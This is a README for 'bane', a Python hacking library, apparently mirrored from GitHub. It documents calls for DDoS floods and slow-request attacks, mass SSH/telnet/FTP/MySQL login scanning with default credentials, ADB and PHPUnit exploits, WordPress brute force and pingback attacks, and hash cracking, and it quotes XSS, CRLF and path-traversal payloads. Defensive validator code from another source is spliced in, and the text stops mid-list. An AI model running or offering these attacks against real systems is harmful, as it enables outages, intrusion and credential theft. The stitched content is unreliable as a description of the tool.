coxchris502 / bane

This is a Python module that contains functions and classes used to test the security of web/network applications. It's written in pure Python and it's a very intelligent tool! It can easily detect: XSS (reflected/stored), RCE (Remote Code/Command Execution), SSTI, SSRF, CORS misconfigurations, file upload, CSRF, path traversal... and more.

"Oh, you think darkness is your ally. But you merely adopted the dark; I was born in it, molded by it. I didn't see the light until I was already a man, by then it was nothing to me but BLINDING! The shadows betray you, because they belong to me!" -Bane (Dark Knight)


                                                  INTRODUCTION:

This Python library is made for educational purposes only. I, as the creator and developer, am not responsible for any misuse of this module in any malicious activity. It is made as a tool to understand how hackers can create their tools and perform their attacks. It contains most of the known attacks and exploits. It can be used to perform: DoS and DDoS attacks (all known tools are included), information gathering, scraping proxies, crawling, Google dorking, checking for vulnerabilities (SQL injection (all types), XSS, command execution, PHP code injection, FI, forced browsing) and even more ;)
The module can be used as a "codebase" for more sophisticated and advanced scanning tools to help secure websites!! I hope you guys use it wisely and carefully ;)


                                                  SPECIAL SPEECH:

This is dedicated to my mentor: Zachary Barker ( https://www.facebook.com/zachary.barker.5439 ). He was my leader and teacher through my journey and adventures in this crazy underground world. We have been through a lot together and were close, but now he is dead in a hit-and-run :( . He was one of my true cyber bros:
-S0u1 ( https://twitter.com/YourAnonS0u1 ) : programmer and blackhat.
-Vince ( https://www.facebook.com/vincelinux ) : Linux and hardware expert, social engineering and programmer.
-Zachary Barker (lulz zombie) : teams leader, anarchist, ops organizer, programmer, cyber security expert and blackhat.
-Lulztigre (https://www.twitter.com/lulztigre) : Bug Bounty Hunter, Penetration Tester And Python Programmer.
-Jen Hill.
In honor of all my people and the memory of my brother Zach, I'm sharing all my personal hacking tools with the public. plz use them wisely :)

now let's start some tutorials, shall we?


                                                  TUTORIALS:

I-INSTALLING THE LIBRARY AND IMPORTING:

If you are using Windows, please first download and install "npcap" from here and restart your computer after that. Then install bane.
You can use pip to install bane (if you are on Linux you must run it with "sudo"):

pip install bane
or
pip3 install bane


or you can clone the project's link then run setup.py

git clone https://github.com/AlaBouali/bane

cd bane
python setup.py install


To use it, open the Python interpreter from your terminal/cmd (bane can only be used inside the interpreter, after importing it):

python
or
python3
then import it and start using it as in the tutorials below:
import bane
If you are using "jython", please go to the location of the jython "site-packages" (example: "C:\jython\Lib\site-packages"), open the "dns" folder, open the file "resolver.py" and comment out line "1149" : socket.SOCK_DGRAM: [socket.SOL_UDP], by putting "#" in front of it.

II-Usage (General usage or read the wiki ):

Vulnerabilities TESTING:

Automatic XSS scan for website:

xss(
      u,
      max_pages=5,
      pages=[],
      payload=None,
      email_extension='@gmail.com',
      phone_pattern='XXX-XXX-XXXX',
      unicode_random_level=0,
      number=(1, 9),
      js_function="alert",
      dont_change={},
      predefined_inputs={},
      replaceble_parameters={"phpvalue": ((".", ""),)},
      file_extension="png",
      context_breaker='">',
      save_to_file=None,
      logs=True,
      fill_empty=10,
      leave_empty=[],
      dont_send=["btnClear"],
      proxy=None,
      proxies=None,
      timeout=10,
      user_agent=None,
      cookie=None,
      debug=False,
      mime_type=None,
      headers={}
  )

This function is designed to perform XSS testing on one or more web pages. It scans for XSS vulnerabilities in forms and inputs on the pages.

Parameters:

  • u: The target URL to test for XSS vulnerabilities.
  • max_pages: Maximum number of pages to scan for XSS (default is 5).
  • pages: List of specific pages to scan (if not provided, it's auto-discovered).
  • payload: The XSS payload to test.
  • email_extension: Email extension for generating email inputs (default is '@gmail.com').
  • phone_pattern: Pattern for generating phone inputs (default is 'XXX-XXX-XXXX').
  • unicode_random_level: Level of Unicode encoding for payload (default is 0).
  • number: Range for generating random numbers (default is between 1 and 9).
  • js_function: JavaScript function to inject (default is "alert").
  • dont_change: A dictionary of parameters not to change during testing.
  • predefined_inputs: A dictionary of predefined inputs for specific parameters.
  • replaceble_parameters: Dictionary mapping parameters to their possible replacements.
  • file_extension: The file extension to use for file inputs (default is "png").
  • context_breaker: Context breaker to insert before payloads (default is '">').
  • save_to_file: If provided, the results will be saved to this file.
  • logs: Boolean to enable or disable logging (default is True).
  • fill_empty: Number of inputs to fill with payload (default is 10).
  • leave_empty: List of inputs not to fill with payloads.
  • dont_send: List of inputs not to send in the request.
  • proxy: A proxy server to use for requests.
  • proxies: List of proxy servers to choose from randomly.
  • timeout: Request timeout in seconds (default is 10).
  • user_agent: User-Agent header to use in requests.
  • cookie: Cookies to include in requests.
  • debug: Boolean to enable or disable debug mode (default is False).
  • mime_type: MIME type for file inputs.
  • headers: Additional headers to include in requests.

Return Value:

The function returns a list of dictionaries, each containing information about XSS testing results on a page.

bane.xss(link , payload="<script>alert(123)</script>" , timeout=15 )

SSTI:

Automatic SSTI scan for website:

ssti(
      u,
      max_pages=5,
      pages=[],
      email_extension='@gmail.com',
      phone_pattern='XXX-XXX-XXXX',
      payload_index=0,
      values=(9, 123456789),
      dont_change={},
      number=(1, 9),
      payload_keyword="payload",
      operator="*",
      save_to_file=None,
      file_extension="png",
      replaceble_parameters={"phpvalue": ((".", ""),)},
      logs=True,
      fill_empty=10,
      leave_empty=[],
      dont_send=["btnClear"],
      proxy=None,
      proxies=None,
      timeout=120,
      user_agent=None,
      cookie=None,
      debug=False,
      mime_type=None,
      predefined_inputs={},
      headers={}
  )

This function is designed to perform Server-Side Template Injection (SSTI) testing on one or more web pages. It scans for SSTI vulnerabilities in the templates used on the pages.

Parameters:

  • u: The target URL to test for SSTI vulnerabilities.
  • max_pages: Maximum number of pages to scan for SSTI (default is 5).
  • pages: List of specific pages to scan (if not provided, it's auto-discovered).
  • email_extension: Email extension for generating email inputs (default is '@gmail.com').
  • phone_pattern: Pattern for generating phone inputs (default is 'XXX-XXX-XXXX').
  • payload_index: Index of the payload value in the input (default is 0).
  • values: Range for generating random values (default is between 9 and 123456789).
  • dont_change: A dictionary of parameters not to change during testing.
  • number: Range for generating random numbers (default is between 1 and 9).
  • payload_keyword: The keyword to identify where to inject the payload.
  • operator: The operator to use for payload injection (default is "*").
  • save_to_file: If provided, the results will be saved to this file.
  • file_extension: The file extension to use for file inputs (default is "png").
  • replaceble_parameters: Dictionary mapping parameters to their possible replacements.
  • logs: Boolean to enable or disable logging (default is True).
  • fill_empty: Number of inputs to fill with payload (default is 10).
  • leave_empty: List of inputs not to fill with payloads.
  • dont_send: List of inputs not to send in the request.
  • proxy: A proxy server to use for requests.
  • proxies: List of proxy servers to choose from randomly.
  • timeout: Request timeout in seconds (default is 120).
  • user_agent: User-Agent header to use in requests.
  • cookie: Cookies to include in requests.
  • debug: Boolean to enable or disable debug mode (default is False).
  • mime_type: MIME type for file inputs.
  • headers: Additional headers to include in requests.

Return Value:

The function returns a list of dictionaries, each containing information about SSTI testing results on a page.

bane.ssti(link  , timeout=15 )

Remote Command Execution Linux Time-Based:

RCE Testing Function Documentation:

rce(
    u,
    max_pages=5,
    pages=[],
    payload_index=0,
    email_extension='@gmail.com',
    phone_pattern='XXX-XXX-XXXX',
    save_to_file=None,
    dont_change={},
    number=(1, 9),
    injection={"code": "php"},
    code_operator_right="; ",
    code_operator_left="",
    command_operator_right="|",
    command_operator_left="&",
    sql_operator_right="or '",
    sql_operator_left="' or ",
    file_extension="png",
    replaceble_parameters={"phpvalue": ((".", ""),)},
    based_on="time",
    delay=10,
    logs=True,
    fill_empty=10,
    leave_empty=[],
    dont_send=["btnClear"],
    proxy=None,
    proxies=None,
    timeout=120,
    user_agent=None,
    cookie=None,
    debug=False,
    mime_type=None,
    predefined_inputs={},
    headers={}
)

This function is designed for Remote Code Execution (RCE) testing on one or more web pages. It scans for RCE vulnerabilities in forms and inputs on the pages.

Parameters:

  • u: The target URL to test for RCE vulnerabilities.
  • max_pages: Maximum number of pages to scan for RCE (default is 5).
  • pages: List of specific pages to scan (if not provided, it's auto-discovered).
  • payload_index: Index of the payload to use from the payloads dictionary (default is 0).
  • email_extension: Email extension for generating email inputs (default is '@gmail.com').
  • phone_pattern: Pattern for generating phone inputs (default is 'XXX-XXX-XXXX').
  • save_to_file: If provided, the results will be saved to this file.
  • dont_change: A dictionary of parameters not to change during testing.
  • number: Range for generating random numbers (default is between 1 and 9).
  • injection: Dictionary specifying the type of injection and the target language (default is {"code": "php"}).
  • code_operator_right: Right operator for code injection (default is "; ").
  • code_operator_left: Left operator for code injection (default is an empty string).
  • command_operator_right: Right operator for command injection (default is "|").
  • command_operator_left: Left operator for command injection (default is "&").
  • sql_operator_right: Right operator for SQL injection (default is "or '").
  • sql_operator_left: Left operator for SQL injection (default is "' or ").
  • file_extension: The file extension to use for file inputs (default is "png").
  • replaceble_parameters: Dictionary mapping parameters to their possible replacements.
  • based_on: The detection basis for the test ("time" or "file") (default is "time").
  • delay: Delay in seconds for time-based attacks (default is 10).
  • logs: Boolean to enable or disable logging (default is True).
  • fill_empty: Number of inputs to fill with payload (default is 10).
  • leave_empty: List of inputs not to fill with payloads.
  • dont_send: List of inputs not to send in the request.
  • proxy: A proxy server to use for requests.
  • proxies: List of proxy servers to choose from randomly.
  • timeout: Request timeout in seconds (default is 120).
  • user_agent: User-Agent header to use in requests.
  • cookie: Cookies to include in requests.
  • debug: Boolean to enable or disable debug mode (default is False).
  • mime_type: MIME type for file inputs.
  • predefined_inputs: A dictionary of predefined inputs for specific parameters.
  • headers: Additional headers to include in requests.

Return Value:

The function returns a list of dictionaries, each containing information about RCE testing results on a page.

bane.rce(link ,injection={"command":"linux"},based_on='time', timeout=15 )

Remote Command Execution Linux File-Based:

bane.rce(link ,injection={"command":"linux"},based_on='file', timeout=15 )

Remote Command Execution Windows Time-Based:

bane.rce(link ,injection={"command":"windows"},based_on='time', timeout=15 )

Remote Command Execution Windows File-Based:

bane.rce(link ,injection={"command":"windows"},based_on='file', timeout=15 )

Remote Code Execution PHP Time-Based:

bane.rce(link ,injection={"code":"php"},based_on='time', timeout=15 )

Remote Code Execution PHP File-Based:

bane.rce(link ,injection={"code":"php"},based_on='file', timeout=15 )

Remote Code Execution PYTHON Time-Based:

bane.rce(link ,injection={"code":"python"},based_on='time', timeout=15 )

Remote Code Execution PYTHON File-Based:

bane.rce(link ,injection={"code":"python"},based_on='file', timeout=15 )

Remote Code Execution PERL Time-Based:

bane.rce(link ,injection={"code":"perl"},based_on='time', timeout=15 )

Remote Code Execution PERL File-Based:

bane.rce(link ,injection={"code":"perl"},based_on='file', timeout=15 )

Remote Code Execution RUBY Time-Based:

bane.rce(link ,injection={"code":"ruby"},based_on='time', timeout=15 )

Remote Code Execution RUBY File-Based:

bane.rce(link ,injection={"code":"ruby"},based_on='file', timeout=15 )

Remote Code Execution NODEJS Time-Based:

bane.rce(link ,injection={"code":"nodejs"},based_on='time', timeout=15 )

Remote Code Execution NODEJS File-Based:

bane.rce(link ,injection={"code":"nodejs"},based_on='file', timeout=15 )

SQL-Injection Time-Based:

bane.rce(link ,injection={"sql":"mysql"}, timeout=15 )#test for MySQL

SQL-Injection Time-Based:

bane.rce(link ,injection={"sql":"oracle"}, timeout=15 )#test for Oracle

SQL-Injection Time-Based:

bane.rce(link ,injection={"sql":"postgre"}, timeout=15 )#test for Postgre

SQL-Injection Time-Based:

bane.rce(link ,injection={"sql":"sql_server"}, timeout=15 )#test for SQL Server

Path traversal:

Path Traversal Vulnerability Scanner

path_traversal(
      u,
      max_pages=5,
      logs=True,
      null_byte=False,
      bypass=False,
      target_os="linux",
      php_wrapper=None,
      proxy=None,
      proxies=None,
      timeout=10,
      user_agent=None,
      cookie=None,
      pages=[],
      headers={}
  )

This function is designed to perform Path Traversal vulnerability testing on one or more web pages. It scans for Path Traversal vulnerabilities in URLs and their associated files on the server.

Parameters:

  • u: The target URL to test for Path Traversal vulnerabilities.
  • max_pages: Maximum number of pages to scan for vulnerabilities (default is 5).
  • logs: Boolean to enable or disable logging (default is True).
  • null_byte: Include null byte (%00) in the path (default is False).
  • bypass: Bypass security measures by adding extra slashes (default is False).
  • target_os: Target operating system ("linux" or "windows"; default is "linux").
  • php_wrapper: Prefix to be added before the traversal path (e.g., "file").
  • proxy: A proxy server to use for requests.
  • proxies: List of proxy servers to choose from randomly.
  • timeout: Request timeout in seconds (default is 10).
  • user_agent: User-Agent header to use in requests.
  • cookie: Cookies to include in requests.
  • pages: List of specific pages to scan (if not provided, it's auto-discovered).
  • headers: Additional headers to include in requests.

Return Value:

The function returns a list of dictionaries, each containing information about Path Traversal testing results on a page. Each dictionary includes a Boolean value indicating whether a vulnerability was found and the URL where the vulnerability was detected.

bane.path_traversal(link, timeout=15 )
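A server-side check that holds up against the variants these options exercise (null byte, extra slashes, a wrapper prefix such as "file"), as an added example that is not part of bane. The names `safe_resolve`, `UnsafePath` and the sample inputs are assumptions made for illustration.

```python
import os
import re
import tempfile
from urllib.parse import unquote

# A leading "scheme:" such as file:, php: or a Windows drive letter (C:).
_SCHEME = re.compile(r"[A-Za-z][A-Za-z0-9+.\-]*:")


class UnsafePath(ValueError):
    """The requested path must not be served."""


def safe_resolve(base_dir, requested, max_decode_rounds=3):
    """Map a raw URL parameter to a path inside base_dir, or raise UnsafePath."""
    value = requested
    # Decode until stable so double-encoded input (%252e%252e) is judged in its final form.
    for _ in range(max_decode_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    else:
        raise UnsafePath("too many encoding layers")
    if "\x00" in value:
        raise UnsafePath("null byte in path")
    # Conservative: any "name:" prefix is refused, which also refuses colons in first segments.
    if _SCHEME.match(value):
        raise UnsafePath("URL scheme or stream wrapper in path")
    # Treat both separators alike, then drop leading slashes:
    # os.path.join would otherwise discard base_dir for an absolute path.
    value = value.replace("\\", "/").lstrip("/")
    base = os.path.realpath(base_dir)
    # realpath collapses "..", repeated slashes and symlinks before the containment test.
    candidate = os.path.realpath(os.path.join(base, value))
    if os.path.commonpath([base, candidate]) != base:
        raise UnsafePath("path escapes base directory")
    return candidate


def classify(base_dir, requested):
    """Return 'allowed' or the rejection reason."""
    try:
        safe_resolve(base_dir, requested)
        return "allowed"
    except UnsafePath as exc:
        return str(exc)


# Constructed sample inputs, one per variant named in the parameter list above.
SAMPLES = [
    "docs/readme.txt",
    "../../etc/passwd",
    "..//..//etc//passwd",
    "..%2f..%2fetc%2fpasswd",
    "%252e%252e%252fetc%252fpasswd",
    "docs/readme.txt%00.png",
    "file:///etc/passwd",
    "/etc/passwd",
]


def run_samples():
    """Classify every sample against a throwaway base directory."""
    with tempfile.TemporaryDirectory() as base:
        return {sample: classify(base, sample) for sample in SAMPLES}


if __name__ == "__main__":
    for sample, verdict in run_samples().items():
        print(f"{sample!r:40} -> {verdict}")
```

The absolute path `/etc/passwd` is allowed because it is re-rooted under the base directory rather than read from the filesystem root.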

SSRF:

Server-Side Request Forgery (SSRF) Scanner

ssrf(
      u,
      max_pages=5,
      logs=True,
      null_byte=False,
      link="http://www.google.com",
      timeout=120,
      signature="<title>Google</title>",
      proxy=None,
      proxies=None,
      user_agent=None,
      cookie=None,
      pages=[],
      headers={}
  )

This function is designed to perform Server-Side Request Forgery (SSRF) vulnerability testing on one or more web pages. It scans for SSRF vulnerabilities in the target URL and its parameters.

Parameters:

  • u: The target URL to test for SSRF vulnerabilities.
  • max_pages: Maximum number of pages to scan for SSRF (default is 5).
  • logs: Boolean to enable or disable logging (default is True).
  • null_byte: Boolean to append a null byte character ("%00") to the URL (default is False).
  • link: The link to be used in SSRF checks (default is "http://www.google.com").
  • timeout: Request timeout in seconds (default is 120).
  • signature: The HTML signature to check in the response (default is "<title>Google</title>").
  • proxy: A proxy server to use for requests.
  • proxies: List of proxy servers to choose from randomly.
  • user_agent: User-Agent header to use in requests.
  • cookie: Cookies to include in requests.
  • pages: List of specific pages to scan (if not provided, it's auto-discovered).
  • headers: Additional headers to include in requests.

Return Value:

The function returns a list of dictionaries, each containing information about SSRF testing results on a page. Each dictionary contains a boolean indicating whether an SSRF vulnerability was found and the URL where it was detected.

bane.ssrf(link )
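The check above succeeds when the server fetches a caller-supplied URL and returns its content, so the mitigation is to validate the destination before any fetch. The following is an added example, not bane's code; `check_outbound_url`, the allowlist, the `resolve` hook and the constructed DNS table are assumptions.

```python
import ipaddress
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def _is_internal(ip_text):
    """True for addresses a public-facing fetcher should never reach."""
    ip = ipaddress.ip_address(ip_text)
    # An IPv4-mapped IPv6 address (::ffff:127.0.0.1) is judged by its embedded IPv4 address.
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


def check_outbound_url(url, allowed_hosts, resolve):
    """Return (True, "ok") if the server may fetch url, else (False, reason).

    resolve is a hypothetical hook: host -> list of IP strings. In production the
    addresses it returns must be the ones the HTTP client actually connects to,
    otherwise a second DNS lookup can give a different answer.
    """
    if "\x00" in url or "%00" in url:
        return False, "null byte"
    try:
        parts = urlsplit(url)
        host = parts.hostname
        _ = parts.port  # raises ValueError on a malformed port
    except ValueError:
        return False, "malformed URL"
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    if not host:
        return False, "no host"
    if parts.username is not None or parts.password is not None:
        return False, "userinfo not allowed"
    host = host.rstrip(".").lower()
    if host not in allowed_hosts:
        return False, "host not in allowlist"
    addresses = resolve(host)
    if not addresses:
        return False, "host does not resolve"
    if any(_is_internal(addr) for addr in addresses):
        return False, "resolves to internal address"
    return True, "ok"


# Constructed data: an allowlist and a fake DNS table so the example runs offline.
ALLOWED_HOSTS = {"images.example.com", "cdn.example.com"}
FAKE_DNS = {
    "images.example.com": ["93.184.216.34"],
    "cdn.example.com": ["10.0.0.5"],  # allowlisted name pointing at an internal address
}

SAMPLES = [
    "https://images.example.com/a.png",
    "http://www.google.com",  # the scanner's default link
    "http://127.0.0.1:8080/admin",
    "https://cdn.example.com/x",
    "file:///etc/passwd",
    "https://images.example.com@internal.example/",
    "https://images.example.com/a.png%00.jpg",
]


def run_samples():
    """Return {url: reason} for every constructed sample."""
    return {
        url: check_outbound_url(url, ALLOWED_HOSTS, lambda h: FAKE_DNS.get(h, []))[1]
        for url in SAMPLES
    }


if __name__ == "__main__":
    for url, reason in run_samples().items():
        print(f"{url:50} -> {reason}")
```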

CR/LF Injection Testing Functions

crlf_unicode_encode(
    random_level=0,
    line_feed_only=False,
    carriage_return_only=False
  )

This function is designed to generate CR/LF (Carriage Return / Line Feed) characters for use in HTTP request parameters. CR/LF injection is a web security vulnerability that can lead to various attacks.

Parameters:

  • random_level: An integer representing the level of randomness in character selection (default is 0).
      - Level 0: Always returns "%0d%0a".
      - Level 1: Randomly selects between "%E5%98%8D%0a" and "%0d%E5%98%8A".
      - Level 2: Always returns "%E5%98%8D%E5%98%8A".
  • line_feed_only: A boolean flag indicating whether to return only the line feed character (default is False).
  • carriage_return_only: A boolean flag indicating whether to return only the carriage return character (default is False).

crlf_header_injection(
    u,
    unicode_random_level=0,
    carriage_return_only=False,
    line_feed_only=False,
    proxy=None,
    timeout=10,
    user_agent=None,
    cookie=None,
    debug=False,
    headers={}
  )

This function is designed to test for CR/LF injection vulnerabilities in HTTP headers of a given URL.

Parameters:

  • u: The target URL to test for CR/LF injection vulnerabilities.
  • unicode_random_level: Level of Unicode encoding for the CR/LF characters (default is 0).
  • carriage_return_only: A boolean flag indicating whether to use only carriage return character (default is False).
  • line_feed_only: A boolean flag indicating whether to use only line feed character (default is False).
  • proxy: A proxy server to use for requests.
  • timeout: Request timeout in seconds (default is 10).
  • user_agent: User-Agent header to use in requests.
  • cookie: Cookies to include in requests.
  • debug: Boolean to enable or disable debug mode (default is False).
  • headers: Additional headers to include in requests.

Return Value:

The function returns True if it finds the string "banetest" in the response headers; otherwise, it returns False.

CRLF header injection:

bane.crlf_header_injection(link, timeout=15 )

CRLF body injection:

crlf_body_injection(
    u,
    proxy=None,
    unicode_random_level=0,
    carriage_return_only=False,
    line_feed_only=False,
    timeout=10,
    user_agent=None,
    cookie=None,
    debug=False,
    headers={}
  )

This function is designed to test for CR/LF injection vulnerabilities in the body of a web page's response.

Parameters:

  • u: The target URL to test for CR/LF injection vulnerabilities.
  • proxy: A proxy server to use for requests.
  • unicode_random_level: Level of Unicode encoding for the CR/LF characters (default is 0).
  • carriage_return_only: A boolean flag indicating whether to use only the carriage return character (default is False).
  • line_feed_only: A boolean flag indicating whether to use only the line feed character (default is False).
  • timeout: Request timeout in seconds (default is 10).
  • user_agent: User-Agent header to use in requests.
  • cookie: Cookies to include in requests.
  • debug: Boolean to enable or disable debug mode (default is False).
  • headers: Additional headers to include in requests.

Return Value:

The function returns True if it finds the string "banetest;$@*" in the response text; otherwise, it returns False.

bane.crlf_body_injection(link, timeout=15 )
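The Unicode forms listed under `random_level` decode to U+560D and U+560A, whose low byte is 0x0D and 0x0A, so a filter that only looks for literal CR/LF misses them when a later component narrows characters to one byte. The validator below is an added example, not bane's code; the function names and the sample values built around the page's sequences are assumptions.

```python
from urllib.parse import unquote

CR, LF = 0x0D, 0x0A

# The encoded sequences listed in the random_level description above.
PAGE_SEQUENCES = ["%0d%0a", "%E5%98%8D%0a", "%0d%E5%98%8A", "%E5%98%8D%E5%98%8A"]


def _decode(raw_param):
    """Percent-decode as strict UTF-8; invalid byte sequences are refused, not replaced."""
    try:
        return unquote(raw_param, encoding="utf-8", errors="strict")
    except UnicodeDecodeError as exc:
        raise ValueError("parameter is not valid UTF-8") from exc


def findings(raw_param):
    """Return [(index, 'U+XXXX')] for characters that are, or narrow to, CR or LF."""
    hits = []
    for i, ch in enumerate(_decode(raw_param)):
        cp = ord(ch)
        if cp in (CR, LF) or (cp > 0xFF and (cp & 0xFF) in (CR, LF)):
            hits.append((i, "U+%04X" % cp))
    return hits


def low_byte_view(raw_param):
    """Show what a component that keeps only the low byte of each character would emit."""
    return bytes(ord(ch) & 0xFF for ch in _decode(raw_param))


def safe_header_value(raw_param):
    """Return the decoded value if it may be copied into a response header, else raise."""
    hits = findings(raw_param)
    if hits:
        raise ValueError("line break in header value: %s" % hits)
    value = _decode(raw_param)
    # Remaining control characters have no place in a header value either.
    if any((ord(c) < 0x20 and c != "\t") or ord(c) == 0x7F for c in value):
        raise ValueError("control character in header value")
    return value


def rejected(raw_param):
    """True when safe_header_value refuses the parameter."""
    try:
        safe_header_value(raw_param)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    for seq in PAGE_SEQUENCES + ["%0a", "%0d"]:
        sample = "en" + seq + "x"  # constructed parameter value
        print(f"{sample:28} rejected={rejected(sample)} hits={findings(sample)}")
    print(low_byte_view("%E5%98%8D%E5%98%8A"))
```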

Clickjacking:

bane.page_clickjacking(link, timeout=15 )

CORS Misconfigurations:

bane.cors_misconfigurations(link, timeout=15 )

CSRF:

cookie="session=fgyujikop"#just an example of a cookie since it requires a session

bane.csrf(link, timeout=15 , cookie=cookie )

File upload:

bane.file_upload(link, timeout=15 )

Android Debug Bridge (ADB) exploit:

bane.adb_exploit(IP , timeout=5 )

Exposed unauthenticated Telnet server:

bane.exposed_telnet(IP , timeout=5 )

Exposed "/.env" File:

bane.exposed_env(link , timeout=15 )

Exposed "/.git" File:

bane.exposed_git(link , timeout=15 )

Sniffable links via network:

bane.interceptable_links(link , timeout=15 )

Springboot actuator:

bane.springboot_actuator(link , timeout=15 )

Vulners API Search for known vulnerabilities on a particular software:

bane.vulners_search("wordpress",version="4.7.4")#just an example

PHPUNIT exploit:

bane.phpunit_exploit(link , timeout=15 )

Shodan report:

api_key="ghbjklmjklmjlkml...."

bane.shodan_report(IP , api_key)

DDoS:

UDP FLOOD:

bane.udp_flood(IP, p= port , min_size=10, max_size=20 , duration= 300 , interval=0.001)

TCP FLOOD:

bane.tcp_flood(IP, p= port , min_size=10, max_size=20 , duration= 300 , interval=0.001 , threads=500, timeout=5)

HTTP FLOOD:

bane.http_spam(IP, p= port , duration= 300 ,interval=0.001 , threads=500 , timeout=5)

HTTP FLOOD using proxies (HTTP/SOCKS4/SOCKS5):

bane.prox_http_spam(IP, p= port , duration= 300 ,interval=0.001 , threads=500 , timeout=5)

Torshammer attack:

bane.torshammer(IP, p= port , duration= 300 ,set_tor=False , threads=500 , timeout=5)

Torshammer attack but through proxies instead of Tor:

bane.prox_hammer(IP, p= port , duration= 300 , threads=500 , timeout=5)

R.U.D.Y attack:

bane.rudy(IP, p= port , duration= 300 ,set_tor=False , threads=500 , timeout=5 , form="q" , page="/search.php")

Xerxes attack:

bane.xerxes(IP, p= port , duration= 300 ,set_tor=False , threads=500 , timeout=5 )

Xerxes attack through proxies:

bane.prox_xerxes(IP, p= port , duration= 300 , threads=500 , timeout=5 )

Slow read attack:

bane.slow_read(IP, p= port , duration= 300 , set_tor=False , threads=500 , timeout=5 )

Backend technologies scan:

bane.scan_backend_technology(link , timeout=15 )

CMS testing:

WordPress scan:

bane.get_wp_infos(link , timeout=15 )

Drupal scan:

bane.get_drupal_infos(link , timeout=15 )

Joomla scan:

bane.get_joomla_infos(link , timeout=15 )

Magento scan:

bane.get_magento_infos(link , timeout=15 )

WordPress testing:

Users list:

bane.wp_users(link , timeout=15 )

User's details:

bane.wp_user(link , user=1 , timeout=15 )

All xmlrpc's available functions:

bane.wp_xmlrpc_methods(link , timeout=15 )

Check if it's possible to perform BruteForce attack through xmlrpc:

bane.wp_xmlrpc_bruteforce(link , timeout=15 )

Check if it's possible to perform Mass BruteForce attack through xmlrpc:

bane.wp_xmlrpc_mass_bruteforce(link , timeout=15 )

Check a Login Combo:

bane.wpadmin(link , username , password , timeout=15 )

Check Multiple Login Combo at once:

bane.wpadmin_mass(link , word_list=["admin:123","admin:HGJJK","admin:HJKL","admin:%MLK"] , timeout=15 )

Check if it's possible to perform PingBack attack through xmlrpc:

bane.wp_xmlrpc_pingback(link , timeout=15 )

Perform PingBack attack through xmlrpc:

bane.wp_xmlrpc_pingback(link , target_url="https://www.example.com" , timeout=15 )

Users Enumeration:

bane.wp_users_enumeration(link , timeout=15 )

WordPress version:

bane.wp_version(link , timeout=15 )

Proxies collecting:

HTTP proxies gathering:

bane.proxyscrape()

SOCKS4 proxies gathering:

bane.proxyscrape(protocol="socks4")

SOCKS5 proxies gathering:

bane.proxyscrape(protocol="socks5")

Checking proxy:

bane.proxy_check(IP , port , proto="http" , timeout=5)

IoTs mass scanning:

Mass ssh scanning: (if you are on Windows OS, please install Putty)

bane.mass_scan(threads=100 , protocol="ssh" , word_list= ["root:root","admin:admin"] )

Mass telnet scanning:

bane.mass_scan(threads=100 , protocol="telnet" , word_list= ["root:root","admin:admin"] )

Mass ftp scanning:

bane.mass_scan(threads=100 , protocol="ftp" , word_list= ["root:root","admin:admin"] )

Mass MySQL scanning:

bane.mass_scan(threads=100 , protocol="mysql" , word_list= ["root:root","admin:admin"] )

Mass Android Debug Bridge (ADB) exploit:

bane.mass_scan(threads=100 , protocol="adb" )

Extract information from page:

Parse all forms in the page:

bane.forms_parser(link , timeout=10 )

Get all page inputs and their values:

bane.inputs(link , value=True , timeout=10 )

Get all page forms and their values:

bane.forms(link , value=True , timeout=10 )

Get login form:

bane.loginform(link , value=True , timeout=10 )

Get all links on the page:

bane.crawl(link , timeout=10 )

Get all paths on the page:

bane.pather(link , timeout=10 )

Get all social media and external links on the page:

bane.media(link , timeout=10 )

Get all subdomains links on the page:

bane.subdomains_extract(link , timeout=10 )

Information gathering:

Get banner:

bane.get_banner(IP , p=port , payload=None , timeout=5 )

Get information about a domain or IP:

bane.info(IP , timeout=15 )

safeweb.norton.com report for a link:

bane.norton_rate(link , timeout=15 )

Your IP address:

bane.myip()

WHOIS:

bane.whois( domain )

GEO-Information for any IP:

bane.geoip( IP )

HTTP headers:

bane.headers( link )

Reverse IP Lookup:

bane.reverse_ip_lookup( IP )

Resolve any domain using a specific DNS server:

bane.resolve( domain , server="8.8.8.8" )

Very Fast port scan:

bane.port_scan( IP , ports=[21,22,23,25,43,53,80,443,2082,3306] , timeout=5 ).result

Subdomains finder:

bane.get_subdomains( domain )

Extract sensitive data from JavaScript files and code embedded in the page:

bane.examine_js_code( url )

Encryption & Hashing:

XOR:

bane.xor_string( data, key )

Caesar:

bane.caesar_string( data, key )

MD5:

bane.md5_string( data )

SHA1:

bane.sha1_string( data )

SHA224:

bane.sha224_string( data )

SHA256:

bane.sha256_string( data )

SHA384:

bane.sha384_string( data )

SHA512:

bane.sha512_string( data )

Base64 encoding:

bane.base64_encode( data )

Base64 decoding:

bane.base64_decode( data )

File content encryption with XOR:

bane.xor_file( file , key )

File content hashing with MD5:

bane.md5_file( file )

File content hashing with SHA1:

bane.sha1_file( file )

File content hashing with SHA224:

bane.sha224_file( file )

File content hashing with SHA256:

bane.sha256_file( file )

File content hashing with SHA384:

bane.sha384_file( file )

File content hashing with SHA512:

bane.sha512_file( file )

File content encoding with base64:

bane.base64_encode_file( file )

File content decoding with base64:

bane.base64_decode_file( file )

Decryption:

MD5:

bane.decrypt(hash , word_list=["admin","admin123","love"] , md5_hash=True )

SHA1:

bane.decrypt(hash , word_list=["admin","admin123","love"] , sha1_hash=True )

SHA224:

bane.decrypt(hash , word_list=["admin","admin123","love"] , sha224_hash=True )

SHA256:

bane.decrypt(hash , word_list=["admin","admin123","love"] , sha256_hash=True )

SHA384:

bane.decrypt(hash , word_list=["admin","admin123","love"] , sha384_hash=True )

SHA512:

bane.decrypt(hash , word_list=["admin","admin123","love"] , sha512_hash=True )

Base64:

bane.decrypt(hash , word_list=["admin","admin123","love"] , base64_string=True )

Caesar:

bane.decrypt(hash , word_list=["admin","admin123","love"] , caesar_hash=True )

Bruteforcing:

Admin login form on web page:

bane.web_login_bruteforce(link , word_list=["admin:admin","admin:1234"] , timeout=15 )

Bruteforce HTTP authentication login:

bane.http_auth_bruteforce(link , word_list=["admin:admin","admin:1234"] , timeout=15 )

FTP server:

